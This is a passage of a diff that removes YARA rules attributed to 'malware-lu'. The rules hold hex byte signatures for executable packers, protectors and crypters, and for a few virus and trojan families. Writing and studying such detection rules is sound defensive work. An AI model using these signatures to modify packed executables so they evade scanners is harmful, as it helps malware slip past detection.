-	$a1 = { FC 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 8B C2 C1 C0 10 66 8B C1 C3 F0 DA 55 8B EC 53 56 33 C9 33 DB 8B 4D 0C 8B 55 10 8B 75 08 4E 4A 83 FB 08 72 05 33 DB 43 EB 01 43 33 C0 8A 04 31 8A 24 13 2A C4 88 04 31 E2 E6 5E 5B C9 C2 0C }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule UPX290LZMAMarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }
-	$a1 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule MEW510Northfox
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv090
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1258ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SVKProtectorv132EngPavolCerven
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeSplitter12BillPrisonerTPOC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 95 02 00 00 64 A1 00 00 00 00 83 38 FF 74 04 8B 00 EB F7 8B 40 04 C3 55 8B EC B8 00 00 00 00 8B 75 08 81 E6 00 00 FF FF B9 06 00 00 00 56 56 E8 B0 00 00 00 5E 83 F8 01 75 06 8B C6 C9 C2 04 00 81 EE 00 00 01 00 E2 E5 C9 C2 04 00 55 8B EC 8B 75 0C 8B DE 03 76 3C 8D 76 18 8D 76 60 8B 36 03 F3 56 8B 76 20 03 F3 33 D2 8B C6 8B 36 03 F3 8B 7D 08 B9 0E 00 00 00 FC F3 A6 0B C9 75 02 EB 08 }
-
-condition:
-		$a0
-}
-	
-	
-rule COPv10c1988
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF ?? ?? BE ?? ?? B9 ?? ?? AC 32 ?? ?? ?? AA E2 ?? 8B ?? ?? ?? EB ?? 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv25RetailSlimLoaderBitsumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Morphinev27Holy_FatherRatter29A
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-	$a1 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule diPackerV1XdiProtectorSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0F 00 2D E9 01 00 A0 E3 68 01 00 EB 8C 00 00 EB 2B 00 00 EB 00 00 20 E0 1C 10 8F E2 8E 20 8F E2 00 30 A0 E3 67 01 00 EB 0F 00 BD E8 00 C0 8F E2 00 F0 9C E5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01REALBasicAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PPCPROTECT11XAlexeyGorchakov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF 5F 2D E9 20 00 9F E5 00 00 90 E5 18 00 8F E5 18 00 9F E5 00 00 90 E5 10 00 8F E5 01 00 A0 E3 00 00 00 EB 02 00 00 EA 04 F0 1F E5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nPackV111502006BetaNEOxuinC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EnigmaProtector11X13XSukhovVladimirSergeNMarkin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 00 10 40 00 E8 01 00 00 00 9A 83 C4 10 8B E5 5D E9 }
-
-condition:
-		$a0
-}
-	
-	
-rule HardlockdongleAlladin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190c
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack_PatchDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 81 3A 00 00 00 02 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeJoinerV10Yodaf2f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCShrink071beta
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 01 AD 54 3A 40 00 FF B5 50 3A 40 00 6A 40 FF 95 88 3A 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMASM32TASM32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B }
-	$a1 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev101BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPX072
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AdFlt2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 01 9C 0F A0 0F A8 60 FD 6A 00 0F A1 BE ?? ?? AD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack120BasicEditionaPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 92 05 00 00 EB 0C 8B 85 8E 05 00 00 89 85 92 05 00 00 8D B5 BA 05 00 00 8D 9D 41 04 00 00 33 FF E8 38 01 00 00 EB 1B 8B 85 92 05 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 9E 05 00 00 00 74 0E 83 BD A2 05 00 00 00 74 05 E8 D6 01 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AsCryptv01SToRM1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 81 ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? E2 ?? EB }
-
-condition:
-		$a0
-}
-	
-	
-rule SmartEMicrosoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 15 03 00 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 8F 07 00 00 89 85 83 07 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 2F 06 00 00 E8 8E 04 00 00 49 0F 88 23 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PE_Admin10EncryptPE12003518SoldFlyingCat
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule MacromediaWindowsFlashProjectorPlayerv40
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPack32v100v111v112v120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtectorV11vcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 1A ED 41 00 B9 EC EB 41 00 50 51 E8 74 00 00 00 E8 51 6A 00 00 58 83 E8 10 B9 B3 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MaskPE16yzkzero
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 36 81 2C 24 ?? ?? ?? 00 C3 60 }
-
-condition:
-		$a0
-}
-	
-	
-rule bambam001bedrock
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 ?? ?? ?? ?? E8 6C FD FF FF B9 05 00 00 00 8B F3 BF ?? ?? ?? ?? 53 F3 A5 E8 8D 05 00 00 8B 3D ?? ?? ?? ?? A1 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 2B CF 89 45 E8 89 0D ?? ?? ?? ?? 66 89 55 EC 8B 41 3C 33 D2 03 C1 83 C4 10 66 8B 48 06 66 8B 50 14 81 E1 FF FF 00 00 8D 5C 02 18 8D 41 FF 85 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MEW11SE10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01BorlandDelphi6070Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 53 8B D8 33 C0 A3 09 09 09 00 6A 00 E8 09 09 00 FF A3 09 09 09 00 A1 09 09 09 00 A3 09 09 09 00 33 C0 A3 09 09 09 00 33 C0 A3 09 09 09 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV12ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 77 1E 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PEProtect09Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPack32v1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 55 8B E8 33 DB EB 60 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ChSfxsmallv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? E8 ?? ?? 8B EC 83 EC ?? 8C C8 BB ?? ?? B1 ?? D3 EB 03 C3 8E D8 05 ?? ?? 89 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXModifiedStubcFarbrauschConsumerConsulting
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02NorthStarPEShrinker13Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv098tE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualBasicMASM32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv022v023BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxVirusConstructorbased
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB ?? ?? B9 ?? ?? 2E ?? ?? ?? ?? 43 43 ?? ?? 8B EC CC 8B ?? ?? 81 ?? ?? ?? 06 1E B8 ?? ?? CD 21 3D ?? ?? ?? ?? 8C D8 48 8E D8 }
-	$a1 = { E8 ?? ?? 5D 81 ?? ?? ?? 06 1E E8 ?? ?? E8 ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B4 4A BB FF FF CD 21 83 ?? ?? B4 4A CD 21 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PESHiELD02
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02Gleam100Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DBPEv233DingBoy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PEtite2xlevel0Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EPack14litefinalby6aHguT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 8B C0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock098tE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E ?? ?? 00 00 00 00 00 00 00 00 00 3E ?? ?? 00 2E ?? ?? 00 26 ?? ?? 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 36 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler10p0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 56 33 C0 89 45 ?? ?? ?? ?? 40 00 E8 11 F4 FF FF BE 30 6B 40 00 33 C0 55 68 C9 42 40 00 64 FF 30 64 89 20 E8 C9 FA FF FF BA D8 42 40 00 8B ?? ?? ?? ?? FF FF 8B D8 B8 28 6B 40 00 8B 16 E8 37 F0 FF FF B8 2C 6B 40 00 8B 16 E8 2B F0 FF FF B8 28 6B 40 00 E8 19 F0 FF FF 8B D0 8B C3 8B 0E E8 42 E3 FF FF BA DC 42 40 00 8B C6 E8 2A FA FF FF 8B D8 B8 20 6B 40 00 8B 16 E8 FC EF FF FF B8 24 6B 40 00 8B 16 E8 F0 EF FF FF B8 20 6B 40 00 E8 DE EF FF FF 8B D0 8B C3 8B 0E E8 07 E3 FF FF 6A 00 6A 19 6A 00 6A 32 A1 28 6B 40 00 E8 59 EF FF FF 83 E8 05 03 C0 8D 55 EC E8 94 FE FF FF 8B 55 EC B9 24 6B 40 00 A1 20 6B 40 00 E8 E2 F6 FF FF 6A 00 6A 19 6A 00 6A 32 }
-
-condition:
-		$a0
-}
-	
-	
-rule WARNINGTROJANADinjector
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 61 BE 00 20 44 00 8D BE 00 F0 FB FF C7 87 9C E0 04 00 6A F0 8A 5E 57 83 CD FF EB 0E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TopSpeedv3011989
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E BA ?? ?? 8E DA 8B ?? ?? ?? 8B ?? ?? ?? FF ?? ?? ?? 50 53 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CodeCryptv0164
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXHiT001DJSiba
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01ASProtectAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PocketPCARM
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AnskyaBinderv11Anskya
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtectorV10Bvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SecurePE1Xwwwdeepzoneorg
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 E8 00 00 00 00 5D 81 ED 4C 2F 40 00 89 85 61 2F 40 00 8D 9D 65 2F 40 00 53 C3 00 00 00 00 8D B5 BA 2F 40 00 8B FE BB 65 2F 40 00 B9 C6 01 00 00 AD 2B C3 C1 C0 03 33 C3 AB 43 81 FB 8E 2F 40 00 75 05 BB 65 2F 40 00 E2 E7 89 AD 1A 31 40 00 89 AD 55 34 40 00 89 AD 68 34 40 00 8D 85 BA 2F 40 00 50 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yPv10bbyAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 C2 E8 03 00 00 00 EB 01 ?? AC ?? ?? ?? ?? ?? ?? ?? EB 01 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRHv031a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F }
